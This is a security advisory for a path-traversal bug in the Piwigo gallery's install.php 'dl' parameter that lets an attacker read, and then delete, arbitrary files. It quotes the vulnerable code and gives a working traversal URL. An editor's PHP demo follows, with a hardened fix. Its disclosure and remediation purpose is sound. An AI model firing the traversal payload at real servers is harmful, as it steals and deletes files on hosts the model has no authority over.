Piwigo is a photo gallery script written in PHP.

Piwigo 2.4.6 and other versions do not properly validate the value of the 'dl' parameter of the install.php script. An attacker can exploit this to read arbitrary files on the affected host that the web server process can read and, because the handler unlinks the file after sending it, to delete those files wherever the web server process has permission to do so.
====================================================================
/install.php:
-------------
113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
114: {
115: $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
116: header('Cache-Control: no-cache, must-revalidate');
117: header('Pragma: no-cache');
118: header('Content-Disposition: attachment; filename="database.inc.php"');
119: header('Content-Transfer-Encoding: binary');
120: header('Content-Length: '.filesize($filename));
121: echo file_get_contents($filename);
122: unlink($filename);
123: exit();
124: }
====================================================================

The 'dl' value is appended to the fixed 'pwg_' prefix and checked only with file_exists(); nothing rejects '../' segments, so a traversal payload selects a file outside the data directory, which line 121 sends to the client and line 122 then deletes.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843

15.02.2013

--

http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
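
The following is an added example by the editor, not Piwigo's code and not the vendor patch. It rebuilds the path construction from install.php lines 113-124 beside a hardened variant that rejects traversal. The scratch directory under the system temp dir, the file names, the $conf layout and the two helper functions are assumptions made for this demonstration.

```php
<?php
// Added example (editor's illustration, not Piwigo's code or the vendor patch).
// The scratch directory, file names, $conf layout and helper functions are
// assumptions for this demonstration.

$root = rtrim(sys_get_temp_dir(), DIRECTORY_SEPARATOR) . '/piwigo_demo/';
@mkdir($root . '_data/pwg_tmp', 0700, true);   // constructed fixture directory
file_put_contents($root . '_data/pwg_database.inc.php', "<?php // generated by the installer\n");
file_put_contents($root . 'secret.txt', "file outside the data directory\n");

define('PHPWG_ROOT_PATH', $root);
$conf = array('data_location' => '_data/');

// Same logic as the original check: the 'dl' value is appended to a fixed
// prefix and only tested with file_exists(), so '../' segments walk out of
// the data directory and the caller then reads and unlinks that file.
function vulnerable_download_path(array $conf, $dl)
{
    $filename = PHPWG_ROOT_PATH . $conf['data_location'] . 'pwg_' . $dl;
    return file_exists($filename) ? $filename : null;
}

// Hardened variant: accept only a plain file name, then confirm that the
// resolved path still lies inside the data directory before touching it.
function safe_download_path(array $conf, $dl)
{
    // A plain name: letters, digits, '_', '-', '.' and never '..'.
    if (!preg_match('/^[A-Za-z0-9_.-]+$/', $dl) || strpos($dl, '..') !== false) {
        return null;
    }
    $base = realpath(PHPWG_ROOT_PATH . $conf['data_location']);
    $candidate = realpath(PHPWG_ROOT_PATH . $conf['data_location'] . 'pwg_' . $dl);
    if ($base === false || $candidate === false) {
        return null;
    }
    // Containment check on the canonical path; this also defeats symlinks
    // that point out of the data directory.
    if (strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

// 'tmp/../../secret.txt' traverses on every platform because _data/pwg_tmp
// exists here; the advisory's own payload instead relies on Windows collapsing
// the non-existent 'pwg_..' segment lexically.
$payload = 'tmp/../../secret.txt';
echo "vulnerable: ", vulnerable_download_path($conf, $payload) ?: 'rejected', "\n";
echo "hardened:   ", safe_download_path($conf, $payload) ?: 'rejected', "\n";
echo "legitimate: ", safe_download_path($conf, 'database.inc.php') ?: 'rejected', "\n";
```

Run it with php on the command line: the vulnerable helper returns a path to secret.txt, the hardened helper rejects the payload and still accepts the legitimate name. Two practitioner notes. First, the advisory's payload puts '../' directly after the fixed prefix, so the first path segment is 'pwg_..'; Windows, where the advisory was tested, collapses '..' segments lexically before consulting the filesystem, so that segment need not exist, whereas Linux resolves each component in turn and the traversal only succeeds when some 'pwg_*' directory exists at that position. Second, since the handler already hardcodes the name database.inc.php in its Content-Disposition header, an even tighter fix is to compare 'dl' against that single expected name rather than a pattern; either way the check must run before both the file_get_contents() and the unlink().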